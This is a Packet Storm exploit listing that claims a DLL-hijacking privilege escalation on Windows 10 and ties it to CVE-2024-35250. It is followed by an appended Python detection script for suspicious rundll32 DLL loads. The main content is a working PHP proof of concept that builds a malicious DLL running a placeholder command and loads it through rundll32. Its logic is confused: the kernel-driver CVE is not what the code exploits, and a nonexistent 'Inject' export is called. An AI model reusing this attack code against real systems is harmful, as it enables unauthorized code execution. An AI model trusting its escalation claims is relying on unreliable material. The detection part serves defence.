Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking (PACKETSTORM:212317)

Severity: 7.8 / 10 HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a DLL hijacking vulnerability that enables privilege escalation...

Basic Information

ID PACKETSTORM:212317
Published Dec 2, 2025 at 00:00

Affected Product

Affected Versions

=============================================================================================================================================
| # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (DLL Hijacking) Privilege Escalation |
| # Author : indoushka |
| # Tested on : Windows 10 Fr (Pro) / browser : Mozilla Firefox 136.0.0 (64 bits) |
| # Vendor : https://www.Microsoft.com |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engines.

[+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default.

There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11 and Windows Server 2022.

[+] What's new in this version?

Added DLL Hijacking exploit inside the code

Create a malicious DLL library directly from inside the code

Use rundll32.exe to automatically load the payload

Ensure all possible environments are supported (Windows 10 and 11)

Improved compatibility with different languages

(Related: https://packetstorm.news/files/id/182984/ ; related CVE: CVE-2024-35250.)


[+] Usage : php poc.php

[+] PayLoad :

<?php
/**
 * Exploit for CVE-2024-35250 on Windows with support for all system languages + DLL hijacking
 */

function getWindowsLCID() {
    $output = shell_exec('wmic os get locale /value');
    preg_match('/Locale=(\w+)/', $output, $matches);
    return isset($matches[1]) ? hexdec($matches[1]) : 1033; // default to en-US when the LCID cannot be read
}

function localeToLanguage($locale) {
    $languages = [
        1033 => ['English', 'C:\\Users\\Public\\'], // en-US
        1036 => ['French', 'C:\\Utilisateurs\\Public\\'], // fr-FR
        3082 => ['Spanish', 'C:\\Usuarios\\Public\\'], // es-ES
        1046 => ['Portuguese', 'C:\\Usuários\\Public\\'], // pt-BR
        1031 => ['German', 'C:\\Benutzer\\Öffentlich\\'], // de-DE
        1049 => ['Russian', 'C:\\Пользователи\\Общие\\'], // ru-RU
        1056 => ['Persian', 'C:\\کاربران\\عمومی\\'], // fa-IR
        1025 => ['Arabic', 'C:\\المستخدمون\\عام\\'], // ar-SA
        1101 => ['Hindi', 'C:\\Users\\Public\\'], // hi-IN
        1114 => ['Aramaic', 'C:\\משתמשים\\ציבורי\\'], // Aramaic
        1037 => ['Hebrew', 'C:\\משתמשים\\ציבורי\\'], // he-IL
        2052 => ['Chinese (Simplified)', 'C:\\用户\\公共\\'], // zh-CN
        1028 => ['Chinese (Traditional)', 'C:\\使用者\\公用\\'], // zh-TW
        1041 => ['Japanese', 'C:\\ユーザー\\パブリック\\'], // ja-JP
        1042 => ['Korean', 'C:\\사용자\\공용\\'], // ko-KR
        1054 => ['Thai', 'C:\\ผู้ใช้\\สาธารณะ\\'], // th-TH
        1066 => ['Vietnamese', 'C:\\Người dùng\\Công cộng\\'], // vi-VN
    ];

    return $languages[$locale] ?? ['Unknown', 'C:\\Users\\Public\\']; // unknown locale: fall back to the English path
}

function getPublicPath() {
    $locale = getWindowsLCID();
    list($lang, $path) = localeToLanguage($locale);
    echo "[+] لغة النظام: $lang (LCID: $locale)\n";
    return $path;
}

function is64BitWindows() {
    // Note: this reflects the bitness of the PHP interpreter, not necessarily that of the OS.
    return (PHP_INT_SIZE === 8);
}

function checkVulnerableDriver() {
    $winDir = getenv('WINDIR');
    $driverPath = $winDir . '\\system32\\drivers\\ks.sys';

    if (!file_exists($driverPath)) {
        die("[X] لم يتم العثور على ks.sys، النظام غير قابل للاستغلال.\n");
    }

    echo "[+] ks.sys موجود في المسار: $driverPath\n";
    return true;
}

function getWindowsBuildNumber() {
    $output = shell_exec('wmic os get BuildNumber /value');
    preg_match('/BuildNumber=(\d+)/', $output, $matches);
    return $matches[1] ?? null;
}

function isVulnerableVersion($buildNumber) {
    $vulnerableBuilds = range(14393, 19045); // Windows 10 1607 through Windows 10 22H2
    return in_array($buildNumber, $vulnerableBuilds);
}

function createMaliciousDLL($dllPath) {
    // C source of the DLL; DllMain runs as soon as the library is mapped into a process.
    $dllCode = <<<EOD
#include <windows.h>
#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        system("cmd.exe /c calc.exe"); // replace calc.exe with the payload to execute
    }
    return TRUE;
}
EOD;

    file_put_contents("payload.c", $dllCode);
    shell_exec("gcc -shared -o $dllPath payload.c -mwindows");
}

function exploit() {
    if (!is64BitWindows()) {
        die("[X] النظام ليس 64 بت، الاستغلال غير ممكن.\n");
    }

    if (!checkVulnerableDriver()) {
        die("[X] لا يمكن متابعة الاستغلال.\n");
    }

    $buildNumber = getWindowsBuildNumber();
    if (!$buildNumber || !isVulnerableVersion($buildNumber)) {
        die("[X] إصدار Windows غير مدعوم: $buildNumber\n");
    }

    echo "[+] تم التحقق من الثغرة، سيتم تنفيذ الهجوم الآن...\n";

    $publicPath = getPublicPath();
    $payloadPath = $publicPath . "exploit_payload.dll";

    echo "[+] سيتم استخدام المسار: $payloadPath\n";

    createMaliciousDLL($payloadPath);

    echo "[+] تم إنشاء DLL الضارة بنجاح...\n";

    $notepad = shell_exec('start /B notepad.exe'); // launch notepad to host the DLL
    sleep(1);

    echo "[+] تم تشغيل Notepad، تنفيذ الحمولة...\n";
    shell_exec("rundll32 $payloadPath,Inject"); // load the payload via rundll32
}

exploit();
?>
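As an added detection example (my code, not the advisory's or Packet Storm's), the following Python applies the defender's counterpart to the loading pattern the PoC above relies on: a signed system loader such as rundll32.exe pulling an unsigned DLL out of a user-writable directory like the Public folder. The Sysmon Event ID 7 (ImageLoad) records it scans are constructed, and the writable-directory markers and severity levels are my assumptions.

```python
from dataclasses import dataclass

# Directory markers a standard user can usually write to (assumed list); the PoC above
# drops exploit_payload.dll under the Public folder. Paths are compared with "/" separators.
USER_WRITABLE_MARKERS = ("/users/public/", "/appdata/local/temp/", "/programdata/", "/windows/temp/")

# Signed system utilities that load whatever DLL they are pointed at; rundll32 is the one the PoC uses.
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}

@dataclass
class ImageLoad:
    image: str         # process that performed the load
    image_loaded: str  # full path of the DLL
    signed: bool       # Sysmon "Signed" field for the DLL

# Constructed Sysmon Event ID 7 records, one per line, "Key: Value" fields separated by " | ".
SAMPLE_EVENTS = r"""
Image: C:\Windows\System32\rundll32.exe | ImageLoaded: C:\Users\Public\exploit_payload.dll | Signed: false
Image: C:\Windows\System32\rundll32.exe | ImageLoaded: C:\Windows\System32\shell32.dll | Signed: true
Image: C:\Windows\System32\notepad.exe | ImageLoaded: C:\Users\Public\exploit_payload.dll | Signed: false
Image: C:\Program Files\App\app.exe | ImageLoaded: C:\Program Files\App\helper.dll | Signed: true
"""

def parse_events(text):
    """Turn the flat records into ImageLoad objects (partition on the first ':' so drive letters survive)."""
    events = []
    for line in text.strip().splitlines():
        fields = {}
        for part in line.split(" | "):
            key, _, value = part.partition(":")
            fields[key.strip()] = value.strip()
        events.append(ImageLoad(fields["Image"], fields["ImageLoaded"], fields["Signed"].lower() == "true"))
    return events

def classify(ev):
    """Return a severity for a suspicious load, or None when the load looks benign."""
    loaded = ev.image_loaded.lower().replace("\\", "/")
    if ev.signed or not any(marker in loaded for marker in USER_WRITABLE_MARKERS):
        return None
    loader = ev.image.lower().replace("\\", "/").rsplit("/", 1)[-1]
    # A system loader pulling an unsigned DLL from a writable path is the hijack pattern itself;
    # any other process doing the same still merits a look, at lower priority.
    return "high" if loader in DLL_LOADERS else "medium"

def scan(text):
    """Return (severity, image, image_loaded) for every record that classify() flags."""
    return [(sev, ev.image, ev.image_loaded)
            for ev in parse_events(text)
            if (sev := classify(ev)) is not None]

if __name__ == "__main__":
    for severity, image, dll in scan(SAMPLE_EVENTS):
        print(f"[{severity}] {image} loaded {dll}")
```

On a real host the same rule can be fed from the Sysmon operational log instead of the constructed records; the only fields it needs are Image, ImageLoaded and Signed.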


Greetings to :

===================================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
